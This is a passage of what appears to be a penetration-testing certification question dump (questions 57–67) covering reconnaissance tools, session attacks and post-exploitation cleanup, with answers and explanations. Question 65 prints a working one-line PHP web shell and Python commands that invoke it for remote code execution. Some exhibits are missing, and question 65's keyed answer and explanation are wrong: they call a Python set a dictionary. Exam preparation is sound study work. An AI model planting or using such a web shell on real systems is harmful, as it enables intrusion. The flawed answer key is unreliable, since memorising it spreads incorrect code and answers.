penetration tester discovered that port 25 was open on an internal Sendmail server.
To remain stealthy, the tester ran the following command from the attack machine:

Which of the following would be the BEST command to use for further progress into the targeted
network?
A. nc 10.10.1.2
B. ssh 10.10.1.2
C. nc 127.0.0.1 5555
D. ssh 127.0.0.1 5555
Answer: C

58.Which of the following should a penetration tester attack to gain control of the state in the HTTP
protocol after the user is logged in?
A. HTTPS communication
B. Public and private keys
C. Password encryption
D. Sessions and cookies
Answer: D
59.A penetration tester wants to find hidden information in documents available on the web at a
particular domain.
Which of the following should the penetration tester use?
A. Netcraft
B. CentralOps
C. Responder
D. FOCA
Answer: D
Explanation:
https://kalilinuxtutorials.com/foca-metadata-hidden-documents/

60.A penetration tester captured the following traffic during a web-application test:

Which of the following methods should the tester use to visualize the authorization information being
transmitted?
A. Decode the authorization header using UTF-8.
B. Decrypt the authorization header using bcrypt.
C. Decode the authorization header using Base64.
D. Decrypt the authorization header using AES.
Answer: C

61.A software company has hired a penetration tester to perform a penetration test on a database
server. The tester has been given a variety of tools used by the company’s privacy policy.
Which of the following would be the BEST to use to find vulnerabilities on this server?
A. OpenVAS
B. Nikto
C. SQLmap
D. Nessus
Answer: C
Explanation:
Reference: https://phoenixnap.com/blog/best-penetration-testing-tools

62.Penetration-testing activities have concluded, and the initial findings have been reviewed with the
client.
Which of the following best describes the NEXT step in the engagement?
A. Acceptance by the client and sign-off on the final report
B. Scheduling of follow-up actions and retesting
C. Attestation of findings and delivery of the report
D. Review of the lessons learned during the engagement
Answer: C

63.A penetration tester was able to compromise a server and escalate privileges.
Which of the following should the tester perform AFTER concluding the activities on the specified
target? (Choose two.)
A. Remove the logs from the server.
B. Restore the server backup.
C. Disable the running services.
D. Remove any tools or scripts that were installed.
E. Delete any created credentials.
F. Reboot the target server.
Answer: D,E

64.A consultant just performed a SYN scan of all the open ports on a remote host and now needs to
remotely identify the type of services that are running on the host.
Which of the following is an active reconnaissance tool that would be BEST to use to accomplish this
task?
A. tcpdump
B. Snort
C. Nmap
D. Netstat
E. Fuzzer
Answer: C

65. During an engagement, a penetration tester was able to upload to a server a PHP file with the
following content:
<?php system($_POST['cmd']); ?>
Which of the following commands should the penetration tester run to successfully achieve RCE?
A. python3 -c "import requests;print (requests.post (url='http://172.16.200.10/uploads/shell.php',
data={'cmd=id'}))"
B. python3 -c "import requests;print (requests.post(url='http://172.16.200.10/uploads/shell.php', data=
('cmd':'id') ) .text) "
C. python3 -c "import requests;print (requests.get (url='http://172.16.200.10/uploads/shell.php',
params= {'cmd':'id'}) )"
D. python3 -c "import requests;print (requests.get (url='http://172.16.200.10/uploads/shell.php',
params= ('cmd':'id'}) .text) "
Answer: A
Explanation:
The PHP file uploaded by the penetration tester allows for Remote Code Execution (RCE) by
executing the command supplied through the cmd POST parameter. To exploit this, the penetration
tester needs to send a POST request to the PHP file with the command they want to execute. Among
the given options, Option A is the most suitable for achieving RCE:
It uses Python's requests library to send a POST request, which is appropriate because the PHP
script expects data through the POST method.
The data parameter in the requests.post function is correctly formatted as a dictionary, which is the
expected format for sending form data in POST requests. It includes the key cmd with the value id,
which is a common command used to display the current user ID and group ID.
The only minor issue with Option A is that it prints the entire response object, which includes not just
the response content but also metadata like status code and headers. To print just the response
content (which would include the output of the id command), appending .text to the requests.post call
would be more precise, but this is a small detail and does not affect the execution of the command.
The other options have various issues:
Option B is close but has a syntax error in the data argument. It uses parentheses () instead of curly
braces {} for the dictionary, and also lacks the .text at the end to print the response content.
Options C and D use the requests.get method, which is not suitable in this scenario because the PHP
script is expecting data through the POST method, not the GET method. Additionally, Option D has a
syntax error similar to Option B.

66.A penetration tester is conducting a penetration test and discovers a vulnerability on a web server
that is owned by the client. Exploiting the vulnerability allows the tester to open a reverse shell.
Enumerating the server for privilege escalation, the tester discovers the following:

Which of the following should the penetration tester do NEXT?


A. Close the reverse shell the tester is using.
B. Note this finding for inclusion in the final report.
C. Investigate the high numbered port connections.
D. Contact the client immediately.
Answer: D

67. A penetration tester was able to gain access to a plaintext file on a user workstation. Upon
opening the file, the tester notices some strings of randomly generated text. The tester is able to use
these strings to move laterally throughout the network by accessing the fileshare on a web
application.
Which of the following should the organization do to remediate the issue?
A. Sanitize user input.
B. Implement password management solution.
C. Rotate keys.
D. Utilize certificate management.
Answer: B
Explanation:
The presence of plaintext strings that can be used to move laterally across the network suggests that
passwords or sensitive tokens are stored insecurely. Implementing a password management solution
would help mitigate this issue by ensuring that passwords are stored securely and are not exposed in
plaintext. Password managers typically use strong encryption to protect stored credentials and
provide secure access to them.
Sanitizing user input, rotating keys, and utilizing certificate management address different aspects of
security but do not directly resolve the issue of insecure password storage.
Reference: Importance of password management: NIST Password Guidelines
Examples of security breaches due to poor password management practices: Forge.
